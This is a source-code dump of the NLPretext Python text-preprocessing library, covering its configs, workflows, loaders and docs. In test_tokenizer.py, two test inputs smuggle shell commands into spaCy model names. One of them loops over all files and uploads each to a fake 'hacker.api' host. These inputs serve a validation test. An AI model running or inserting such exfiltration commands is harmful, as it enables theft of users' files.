├── nlpretext
│   ├── py.typed
│   ├── cli
│   │   ├── __init__.py
│   │   ├── __main__.py
│   │   └── preprocess.py
│   ├── _utils
│   │   ├── daskloader.py
│   │   ├── __init__.py
│   │   ├── pandasloader.py
│   │   ├── stopwords.py
│   │   ├── file_loader.py
│   │   └── phone_number.py
│   ├── basic
│   │   ├── __init__.py
│   │   └── preprocess.py
│   ├── token
│   │   ├── __init__.py
│   │   ├── preprocess.py
│   │   └── tokenizer.py
│   ├── _config
│   │   ├── __init__.py
│   │   ├── constants.py
│   │   └── config.py
│   ├── social
│   │   ├── __init__.py
│   │   └── preprocess.py
│   ├── augmentation
│   │   ├── __init__.py
│   │   └── text_augmentation.py
│   ├── __init__.py
│   ├── preprocessor.py
│   └── textloader.py
├── tests
│   ├── __init__.py
│   ├── test_tokenizer.py
│   ├── test_phone_number.py
│   ├── test_data_augmentation.py
│   ├── test_file_loader.py
│   └── test_textloader.py
├── references
│   ├── .gitkeep
│   └── logo_nlpretext.png
├── docs
│   ├── source
│   │   ├── _static
│   │   │   └── images
│   │   │       └── python_logo.png
│   │   ├── tutorials
│   │   │   ├── index.rst
│   │   │   └── basic_notebook.ipynb
│   │   ├── _templates
│   │   │   ├── module.rst_t
│   │   │   ├── versions.html
│   │   │   └── package.rst_t
│   │   ├── index.rst
│   │   └── conf.py
│   ├── Makefile
│   ├── scripts
│   │   └── buildsite.sh
│   └── make.bat
├── .github
│   ├── CODEOWNERS
│   ├── ISSUE_TEMPLATE
│   │   ├── config.yml
│   │   ├── question.md
│   │   ├── feature_request.md
│   │   └── bug_report.md
│   ├── workflows
│   │   ├── release-drafter.yml
│   │   ├── greetings.yml
│   │   ├── ci.yml
│   │   └── cd.yml
│   ├── .stale.yml
│   ├── release-drafter.yml
│   ├── dependabot.yml
│   └── PULL_REQUEST_TEMPLATE.md
├── .dockerignore
├── .editorconfig
├── docker
│   ├── Dockerfile
│   └── README.md
├── datasets
│   └── external
│       ├── get_language_dataset.sh
│       └── get_stanfordtweets.sh
├── SECURITY.md
├── .pre-commit-config.yaml
├── CONTRIBUTING.md
├── CODE_OF_CONDUCT.md
├── Makefile
├── pyproject.toml
├── LICENSE
├── .gitignore
└── README.md
/nlpretext/py.typed:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/tests/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/references/.gitkeep:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/nlpretext/cli/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/references/logo_nlpretext.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/artefactory/NLPretext/HEAD/references/logo_nlpretext.png
--------------------------------------------------------------------------------
/docs/source/_static/images/python_logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/artefactory/NLPretext/HEAD/docs/source/_static/images/python_logo.png
--------------------------------------------------------------------------------
/.github/CODEOWNERS:
--------------------------------------------------------------------------------
1 | # https://help.github.com/en/articles/about-code-owners
2 |
3 | * @julesbertrand @amaleelhamri @hugovasselin @Guillaume6606
4 |
--------------------------------------------------------------------------------
/docs/source/tutorials/index.rst:
--------------------------------------------------------------------------------
1 | Tutorials
2 | =========
3 |
4 |
5 | .. toctree::
6 | :maxdepth: 4
7 | :glob:
8 |
9 | basic_notebook
10 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/config.yml:
--------------------------------------------------------------------------------
1 | # Configuration: https://help.github.com/en/github/building-a-strong-community/configuring-issue-templates-for-your-repository
2 |
3 | blank_issues_enabled: false
4 |
--------------------------------------------------------------------------------
/docs/source/_templates/module.rst_t:
--------------------------------------------------------------------------------
1 |
2 | {%- if show_headings %}
3 | {{- [basename] | join(' ') | e | heading }}
4 |
5 | {% endif -%}
6 | .. automodule:: {{ qualname }}
7 | {%- for option in automodule_options %}
8 | :{{ option }}:
9 | {%- endfor %}
10 |
--------------------------------------------------------------------------------
/.github/workflows/release-drafter.yml:
--------------------------------------------------------------------------------
1 | name: Release Drafter
2 |
3 | on:
4 | push:
5 | # branches to consider in the event; optional, defaults to all
6 | branches:
7 | - main
8 |
9 | jobs:
10 | update_release_draft:
11 | runs-on: ubuntu-latest
12 | steps:
13 | # Drafts your next Release notes as Pull Requests are merged into "main"
14 | - uses: release-drafter/release-drafter@v5.22.0
15 | env:
16 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
17 |
--------------------------------------------------------------------------------
/.dockerignore:
--------------------------------------------------------------------------------
1 | # Git
2 | .git
3 | .gitignore
4 | .github
5 |
6 | # Docker
7 | .dockerignore
8 | docker/
9 |
10 | # IDE
11 | .idea
12 | .vscode
13 |
14 | # Byte-compiled / optimized / DLL files
15 | __pycache__/
16 | **/__pycache__/
17 | *.pyc
18 | *.pyo
19 | *.pyd
20 | .Python
21 | *.py[cod]
22 | *$py.class
23 | .pytest_cache/
24 | .mypy_cache/
25 |
26 | # poetry
27 | .venv
28 |
29 | # C extensions
30 | *.so
31 |
32 | # Virtual environment
33 | .venv
34 | venv
35 |
36 | .DS_Store
37 | .AppleDouble
38 | .LSOverride
39 | ._*
40 |
--------------------------------------------------------------------------------
/.editorconfig:
--------------------------------------------------------------------------------
1 | # Check http://editorconfig.org for more information
2 | # This is the main config file for this project:
3 | root = true
4 |
5 | [*]
6 | charset = utf-8
7 | end_of_line = lf
8 | insert_final_newline = true
9 | indent_style = space
10 | indent_size = 2
11 | trim_trailing_whitespace = true
12 |
13 | [*.{py,pyi}]
14 | indent_style = space
15 | indent_size = 4
16 |
17 | [Makefile]
18 | indent_style = tab
19 |
20 | [*.md]
21 | trim_trailing_whitespace = false
22 |
23 | [*.{diff,patch}]
24 | trim_trailing_whitespace = false
25 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/question.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: ❓ Question
3 | about: Ask a question about this project 🎓
4 | title: ''
5 | labels: question
6 | assignees:
7 | ---
8 |
9 | ## Checklist
10 |
11 |
12 |
13 | - [ ] I've searched the project's [`issues`](https://github.com/artefactory/NLPretext/issues?q=is%3Aissue).
14 |
15 | ## ❓ Question
16 |
17 |
18 |
19 | How can I [...]?
20 |
21 | Is it possible to [...]?
22 |
23 | ## 📎 Additional context
24 |
25 |
26 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: 🚀 Feature request
3 | about: Suggest an idea for this project 🏖
4 | title: ''
5 | labels: enhancement
6 | assignees:
7 | ---
8 |
9 | ## 🚀 Feature Request
10 |
11 |
12 |
13 | ## 🔈 Motivation
14 |
15 |
16 |
17 | ## 🛰 Alternatives
18 |
19 |
20 |
21 | ## 📎 Additional context
22 |
23 |
24 |
--------------------------------------------------------------------------------
/docker/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.10-slim-buster
2 |
3 | ENV LANG=C.UTF-8 \
4 | LC_ALL=C.UTF-8
5 |
6 | RUN apt-get update && \
7 | apt-get install -y --no-install-recommends \
8 | curl coreutils \
9 | && rm -rf /var/lib/apt/lists/*
10 |
11 | # Install Poetry
12 | ENV POETRY_VERSION=1.5.1
13 | RUN pip install --upgrade pip
14 | RUN python3 -m pip install "poetry==$POETRY_VERSION"
15 |
16 | WORKDIR /home/workspace
17 |
18 | COPY pyproject.toml ./
19 |
20 | RUN poetry config virtualenvs.create false \
21 |     && poetry lock \
22 |     && poetry install --no-root --only main --no-interaction
23 |
24 | COPY . /home/workspace/
25 |
26 | ENTRYPOINT ["poetry", "run", "nlpretext"]
27 |
--------------------------------------------------------------------------------
/nlpretext/cli/__main__.py:
--------------------------------------------------------------------------------
1 | # mypy: disable-error-code="attr-defined"
2 |
3 | import typer
4 | from nlpretext import __version__
5 | from nlpretext.cli import preprocess
6 | from rich.console import Console
7 |
8 | app = typer.Typer(
9 | name="nlpretext",
10 | help="All the goto functions you need to handle NLP use-cases, integrated in NLPretext",
11 | add_completion=True,
12 | )
13 | app.add_typer(preprocess.app, name="preprocess")
14 | console = Console()
15 |
16 |
17 | def version_callback(value: bool) -> None:
18 | """Prints the version of the package."""
19 | if value:
20 | console.print(f"[yellow]nlpretext[/] version: [bold blue]{__version__}[/]")
21 | raise typer.Exit()
22 |
--------------------------------------------------------------------------------
/tests/test_tokenizer.py:
--------------------------------------------------------------------------------
1 | import pytest
2 | from nlpretext.token.tokenizer import LanguageNotInstalledError, _load_spacy_model
3 |
4 |
5 | @pytest.mark.parametrize(
6 | "bad_model_name",
7 | [
8 | ("en_core_web_sm; chmod -x hacker"),
9 | (
10 | "fr_core_news_sm | for file in $(find .); "
11 | 'do curl_command -X POST -H "Content-Type: multipart/form-data" '
12 | '-F "data=@${file}" https-fake://hacker.api/upload; done'
13 | ),
14 | ],
15 | )
16 | def test_load_spacy_model_validation(bad_model_name):
17 | with pytest.raises(LanguageNotInstalledError) as e:
18 | _load_spacy_model(bad_model_name)
19 | assert bad_model_name in str(e.value)
20 |
--------------------------------------------------------------------------------
/.github/.stale.yml:
--------------------------------------------------------------------------------
1 | # Number of days of inactivity before an issue becomes stale
2 | daysUntilStale: 60
3 | # Number of days of inactivity before a stale issue is closed
4 | daysUntilClose: 7
5 | # Issues with these labels will never be considered stale
6 | exemptLabels:
7 | - pinned
8 | - security
9 | # Label to use when marking an issue as stale
10 | staleLabel: wontfix
11 | # Comment to post when marking an issue as stale. Set to `false` to disable
12 | markComment: >
13 | This issue has been automatically marked as stale because it has not had
14 | recent activity. It will be closed if no further activity occurs. Thank you
15 | for your contributions.
16 | # Comment to post when closing a stale issue. Set to `false` to disable
17 | closeComment: false
18 |
--------------------------------------------------------------------------------
/nlpretext/_utils/daskloader.py:
--------------------------------------------------------------------------------
1 | # mypy: disable-error-code="attr-defined"
2 | from typing import List, Union
3 |
4 | import dask.bag as db
5 | import dask.dataframe as dd
6 |
7 |
8 | def read_text(files_path: Union[str, List[str]], encoding: str): # type: ignore
9 | return db.read_text(files_path, encoding=encoding).str.strip().to_dataframe()
10 |
11 |
12 | def read_json(files_path: Union[str, List[str]], encoding: str): # type: ignore
13 | return dd.read_json(files_path, encoding=encoding)
14 |
15 |
16 | def read_csv(files_path: Union[str, List[str]], encoding: str): # type: ignore
17 | return dd.read_csv(files_path, encoding=encoding)
18 |
19 |
20 | def read_parquet(files_path: Union[str, List[str]], encoding: str):  # type: ignore
21 |     # Parquet files embed their own encoding; `encoding` is kept for interface
22 |     # consistency with the other readers but is not forwarded to dask.
23 |     return dd.read_parquet(files_path)
24 |
--------------------------------------------------------------------------------
/.github/workflows/greetings.yml:
--------------------------------------------------------------------------------
1 | name: Greetings
2 |
3 | on:
4 | pull_request:
5 | types:
6 | - opened
7 | - reopened
8 | - edited
9 | - labeled
10 | - unlabeled
11 | - synchronize
12 | issues:
13 |
14 | jobs:
15 | greeting:
16 | runs-on: ubuntu-latest
17 | if: ${{ !contains(github.head_ref, 'dependabot/') }}
18 | steps:
19 | - uses: actions/first-interaction@v1
20 | with:
21 | repo-token: ${{ secrets.GITHUB_TOKEN }}
22 | pr-message: 'Hello @${{ github.actor }}, thank you for submitting a PR! We will respond as soon as possible.'
23 | issue-message: |
24 | Hello @${{ github.actor }}, thank you for your interest in our work!
25 |
26 |             If this is a bug report, please provide screenshots and **minimum viable code to reproduce your issue**, otherwise we cannot help you.
27 |
--------------------------------------------------------------------------------
/nlpretext/basic/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
--------------------------------------------------------------------------------
/nlpretext/token/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
--------------------------------------------------------------------------------
/.github/release-drafter.yml:
--------------------------------------------------------------------------------
1 | # Release drafter configuration https://github.com/release-drafter/release-drafter#configuration
2 | # Emojis were chosen to match the https://gitmoji.carloscuesta.me/
3 |
4 | name-template: "$NEXT_PATCH_VERSION"
5 | tag-template: "$NEXT_PATCH_VERSION"
6 |
7 | categories:
8 | - title: ":rocket: Features"
9 | labels: [enhancement, feature]
10 | - title: ":wrench: Fixes & Refactoring"
11 | labels: [bug, refactoring, bugfix, fix]
12 | - title: ":package: Build System & CI/CD"
13 | labels: [build, ci, testing]
14 | - title: ":boom: Breaking Changes"
15 | labels: [breaking]
16 | - title: ":pencil: Documentation"
17 | labels: [documentation]
18 | - title: ":arrow_up: Dependencies updates"
19 | labels: [dependencies]
20 |
21 | template: |
22 | ## What’s Changed
23 |
24 | $CHANGES
25 |
26 | ## :busts_in_silhouette: List of contributors
27 |
28 | $CONTRIBUTORS
29 |
--------------------------------------------------------------------------------
/nlpretext/_config/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
--------------------------------------------------------------------------------
/nlpretext/_utils/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
--------------------------------------------------------------------------------
/nlpretext/social/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
--------------------------------------------------------------------------------
/nlpretext/augmentation/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: 🐛 Bug report
3 | about: If something isn't working 🔧
4 | title: ''
5 | labels: bug
6 | assignees:
7 | ---
8 |
9 | ## 🐛 Bug Report
10 |
11 |
12 |
13 | ## 🔬 How To Reproduce
14 |
15 | Steps to reproduce the behavior:
16 |
17 | 1. ...
18 |
19 | ### Code sample
20 |
21 |
22 |
23 | ### Environment
24 |
25 | * OS: [e.g. Linux / Windows / macOS]
26 | * Python version, get it with:
27 |
28 | ```bash
29 | python --version
30 | ```
31 |
32 | ### Screenshots
33 |
34 |
35 |
36 | ## 📈 Expected behavior
37 |
38 |
39 |
40 | ## 📎 Additional context
41 |
42 |
43 |
--------------------------------------------------------------------------------
/docs/source/_templates/versions.html:
--------------------------------------------------------------------------------
 1 |
 2 | {%- if current_version %}
 3 | <div class="rst-versions" data-toggle="rst-versions" role="note" aria-label="versions">
 4 |   <span class="rst-current-version" data-toggle="rst-current-version">
 5 |     <span class="fa fa-book"> Other Versions</span>
 6 |     v: {{ current_version.name }}
 7 |     <span class="fa fa-caret-down"></span>
 8 |   </span>
 9 |   <div class="rst-other-versions">
10 |     {%- if versions.tags %}
11 |     <dl>
12 |       <dt>Tags</dt>
13 |       {%- for item in versions.tags %}
14 |       <dd><a href="{{ item.url }}">{{ item.name }}</a></dd>
15 |       {%- endfor %}
16 |     </dl>
17 |     {%- endif %}
18 |     {%- if versions.branches %}
19 |     <dl>
20 |       <dt>Branches</dt>
21 |       {%- for item in versions.branches %}
22 |       <dd><a href="{{ item.url }}">{{ item.name }}</a></dd>
23 |       {%- endfor %}
24 |     </dl>
25 |     {%- endif %}
26 |   </div>
27 | </div>
28 | {%- endif %}
29 |
--------------------------------------------------------------------------------
/docs/source/index.rst:
--------------------------------------------------------------------------------
1 | =========
2 | NLPretext
3 | =========
4 |
5 |
6 | Welcome to NLPretext's documentation!
7 | ========================================
8 |
 9 | NLPretext aims to be a meta-library that helps you get started with preprocessing for your NLP use cases.
10 |
11 |
12 | Installation
13 | ============
14 |
15 | This package has been tested on Python ``3.8``, ``3.9`` and ``3.10``. It does not support Python 2.7, which reached end of life in January 2020.
16 |
17 | To install this library, run:
18 |
19 | .. code-block:: bash
20 |
21 |     pip install nlpretext
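22 |
23 | A minimal usage sketch, based on the default pipeline defined in ``nlpretext/preprocessor.py`` (the sample text is illustrative):
24 |
25 | .. code-block:: python
26 |
27 |     from nlpretext import Preprocessor
28 |
29 |     # The default pipeline removes HTML tags, mentions, emoji, hashtags and
30 |     # end-of-line characters, then fixes bad unicode and normalizes whitespace.
31 |     preprocessor = Preprocessor()
32 |     clean_text = preprocessor.run("Hello   world! #nlp @user")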
33 |
34 | .. toctree::
35 |    :maxdepth: 4
36 |    :caption: Tutorials:
37 |
38 |    ./tutorials/index
39 |
40 | .. toctree::
41 |    :maxdepth: 2
42 |    :caption: API Reference:
43 |
44 |    ./apidoc/modules
45 |
46 | Indices and tables
47 | ==================
48 |
49 | * :ref:`genindex`
50 | * :ref:`modindex`
51 | * :ref:`search`
--------------------------------------------------------------------------------
/docker/README.md:
--------------------------------------------------------------------------------
1 | # Docker for nlpretext
2 |
3 | ## Installation
4 |
5 | To build the Docker image, run:
6 |
7 | ```bash
8 | make docker
9 | ```
10 |
11 | which is equivalent to:
12 |
13 | ```bash
14 | make docker VERSION=latest
15 | ```
16 |
17 | You can also provide a name and a version for the image itself.
18 | Default name is `IMAGE := nlpretext`.
19 | Default version is `VERSION := latest`.
20 |
21 | ```bash
22 | make docker IMAGE=some_name VERSION=1.0.4
23 | ```
24 |
25 | ## Usage
26 |
27 | ```bash
28 | docker run -it --rm \
29 | -v $(pwd):/workspace \
30 |     --entrypoint bash nlpretext
31 | ```
32 |
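33 | Since the image entrypoint is `poetry run nlpretext` (see `docker/Dockerfile`), you can also call the preprocessing CLI directly. A sketch, assuming a hypothetical input file `data.txt` in the current directory:
34 |
35 | ```bash
36 | docker run -it --rm \
37 |     -v $(pwd):/workspace \
38 |     nlpretext preprocess run -i /workspace/data.txt -o /workspace/output.parquet
39 | ```
40 |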
41 | ## How to clean up
42 |
43 | To remove the Docker image, run `make clean_docker` with `VERSION`:
44 |
45 | ```bash
46 | make clean_docker VERSION=1.0.4
47 | ```
48 |
49 | As with installation, you can also choose the image name:
50 |
51 | ```bash
52 | make clean_docker IMAGE=some_name VERSION=latest
53 | ```
54 |
55 | If you want to clean everything, including `build`, run `make clean`.
56 |
--------------------------------------------------------------------------------
/docs/Makefile:
--------------------------------------------------------------------------------
1 | # Minimal makefile for Sphinx documentation
2 | #
3 |
4 | # You can set these variables from the command line, and also
5 | # from the environment for the first two.
6 | SPHINXOPTS ?=
7 | SPHINXBUILD ?= poetry run sphinx-build
8 | SPHINXAPIBUILD ?= poetry run sphinx-apidoc
9 | SPHINXMULTIVERSION ?= poetry run sphinx-multiversion
10 | SOURCEDIR = source
11 | BUILDDIR = build
12 |
13 | # Put it first so that "make" without argument is like "make help".
14 | .PHONY: help Makefile
15 | help:
16 | @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
17 |
18 | multiversion:
19 | @$(SPHINXMULTIVERSION) $(SOURCEDIR) $(BUILDDIR)/html
20 |
21 | apidoc:
22 | @$(SPHINXAPIBUILD) -f -o source/apidoc/ ../nlpretext/ --implicit-namespaces -M -t source/_templates
23 |
24 | # Catch-all target: route all unknown targets to Sphinx using the new
25 | # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
26 | %: Makefile
27 | @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
28 |
--------------------------------------------------------------------------------
/datasets/external/get_language_dataset.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # GNU Lesser General Public License v3.0 only
 3 | # Copyright (C) 2020 Artefact
 4 | # licence-information@artefact.com
 5 | #
 6 | # This program is free software; you can redistribute it and/or
 7 | # modify it under the terms of the GNU Lesser General Public
 8 | # License as published by the Free Software Foundation; either
 9 | # version 3 of the License, or (at your option) any later version.
10 | #
11 | # This program is distributed in the hope that it will be useful,
12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
14 | # Lesser General Public License for more details.
15 | #
16 | # You should have received a copy of the GNU Lesser General Public License
17 | # along with this program; if not, write to the Free Software Foundation,
18 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
19 | wget -O wili.zip "https://zenodo.org/record/841984/files/wili-2018.zip?download=1"
20 | mkdir -p wili && cp wili.zip wili && cd wili && unzip wili.zip && cd ..
21 |
--------------------------------------------------------------------------------
/datasets/external/get_stanfordtweets.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # GNU Lesser General Public License v3.0 only
 3 | # Copyright (C) 2020 Artefact
 4 | # licence-information@artefact.com
 5 | #
 6 | # This program is free software; you can redistribute it and/or
 7 | # modify it under the terms of the GNU Lesser General Public
 8 | # License as published by the Free Software Foundation; either
 9 | # version 3 of the License, or (at your option) any later version.
10 | #
11 | # This program is distributed in the hope that it will be useful,
12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
14 | # Lesser General Public License for more details.
15 | #
16 | # You should have received a copy of the GNU Lesser General Public License
17 | # along with this program; if not, write to the Free Software Foundation,
18 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
19 | wget -O trainingandtestdata.zip http://cs.stanford.edu/people/alecmgo/trainingandtestdata.zip
20 | mkdir -p tweets_sentiment && cp trainingandtestdata.zip tweets_sentiment && cd tweets_sentiment && unzip trainingandtestdata.zip
21 |
--------------------------------------------------------------------------------
/nlpretext/_utils/pandasloader.py:
--------------------------------------------------------------------------------
1 | from typing import List, Union
2 |
3 | import pandas as pd
4 | from fsspec import open_files
5 |
6 |
7 | def _list_handler(func):  # wraps a single-file reader to accept a list of paths or a wildcard
8 | def wrapper_list_handler(file_path: Union[str, List[str]], *args, **kwargs) -> pd.DataFrame: # type: ignore
9 | list_files = open_files(file_path)
10 | list_df = [func(file.path, *args, **kwargs) for file in list_files]
11 | df = pd.concat(list_df)
12 | return df
13 |
14 | return wrapper_list_handler
15 |
16 |
17 | @_list_handler
18 | def read_text(file_path: str, encoding: str) -> pd.DataFrame:
19 | df = pd.read_fwf(file_path, encoding=encoding, colspecs=[(None, None)])
20 | return df
21 |
22 |
23 | @_list_handler
24 | def read_json(file_path: str, encoding: str) -> pd.DataFrame:
25 | df = pd.read_json(file_path, encoding=encoding)
26 | return df
27 |
28 |
29 | @_list_handler
30 | def read_csv(file_path: str, encoding: str) -> pd.DataFrame:
31 | df = pd.read_csv(file_path, encoding=encoding)
32 | return df
33 |
34 |
35 | @_list_handler
36 | def read_parquet(file_path: str, encoding: str) -> pd.DataFrame:
37 |     # Parquet files embed their own encoding; `encoding` is kept for interface
38 |     # consistency with the other readers but is not forwarded to pandas.
39 |     df = pd.read_parquet(file_path)
40 |     return df
41 |
--------------------------------------------------------------------------------
/.github/dependabot.yml:
--------------------------------------------------------------------------------
1 | # Configuration: https://dependabot.com/docs/config-file/
2 | # Docs: https://docs.github.com/en/github/administering-a-repository/keeping-your-dependencies-updated-automatically
3 |
4 | version: 2
5 |
6 | updates:
7 | - package-ecosystem: "pip"
8 | directory: "/"
9 | schedule:
10 | interval: "weekly"
11 | day: "monday"
12 | time: "09:00"
13 | allow:
14 | - dependency-type: "all"
15 | ignore:
16 | - dependency-name: "*"
17 | update-types: ["version-update:semver-patch"]
18 | labels:
19 | - draft
20 | - dependencies
21 | - python
22 | - package-ecosystem: "github-actions"
23 | directory: "/"
24 | schedule:
25 | interval: "weekly"
26 | day: "monday"
27 | time: "09:00"
28 | allow:
29 | - dependency-type: "all"
30 | labels:
31 | - draft
32 | - dependencies
33 | - github_actions
34 | - package-ecosystem: "docker"
35 | directory: "/docker/"
36 | schedule:
37 | interval: "weekly"
38 | day: "monday"
39 | time: "09:00"
40 | allow:
41 | - dependency-type: "all"
42 | labels:
43 | - draft
44 | - dependencies
45 | - docker
46 |
--------------------------------------------------------------------------------
/SECURITY.md:
--------------------------------------------------------------------------------
1 | # Security
2 |
3 | ## 🔐 Reporting Security Issues
4 |
5 | > Do not open issues that might have security implications!
6 | > It is critical that security related issues are reported privately so we have time to address them before they become public knowledge.
7 |
8 | Vulnerabilities can be reported by emailing core members:
9 |
10 | - artefactory [jules.bertrand@artefact.com](mailto:jules.bertrand@artefact.com)
11 |
12 | Please include the requested information listed below (as much as you can provide) to help us better understand the nature and scope of the possible issue:
13 |
14 | - Type of issue (e.g. buffer overflow, SQL injection, cross-site scripting, etc.)
15 | - Full paths of source file(s) related to the manifestation of the issue
16 | - The location of the affected source code (tag/branch/commit or direct URL)
17 | - Any special configuration required to reproduce the issue
18 | - Environment (e.g. Linux / Windows / macOS)
19 | - Step-by-step instructions to reproduce the issue
20 | - Proof-of-concept or exploit code (if possible)
21 | - Impact of the issue, including how an attacker might exploit the issue
22 |
23 | This information will help us triage your report more quickly.
24 |
25 | ## Preferred Languages
26 |
27 | We prefer all communications to be in English.
28 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | ## Description
2 |
3 |
4 |
5 | ## Related Issue
6 |
7 |
8 |
9 | ## Type of Change
10 |
11 |
12 |
13 | - [ ] 📚 Examples / docs / tutorials / dependencies update
14 | - [ ] 🔧 Bug fix (non-breaking change which fixes an issue)
15 | - [ ] 🥂 Improvement (non-breaking change which improves an existing feature)
16 | - [ ] 🚀 New feature (non-breaking change which adds functionality)
17 | - [ ] 💥 Breaking change (fix or feature that would cause existing functionality to change)
18 | - [ ] 🔐 Security fix
19 |
20 | ## Checklist
21 |
22 |
23 |
24 | - [ ] I've read the [`CODE_OF_CONDUCT.md`](https://github.com/artefactory/NLPretext/blob/main/CODE_OF_CONDUCT.md) document.
25 | - [ ] I've read the [`CONTRIBUTING.md`](https://github.com/artefactory/NLPretext/blob/main/CONTRIBUTING.md) guide.
26 | - [ ] I've updated the code style using `make format-code`.
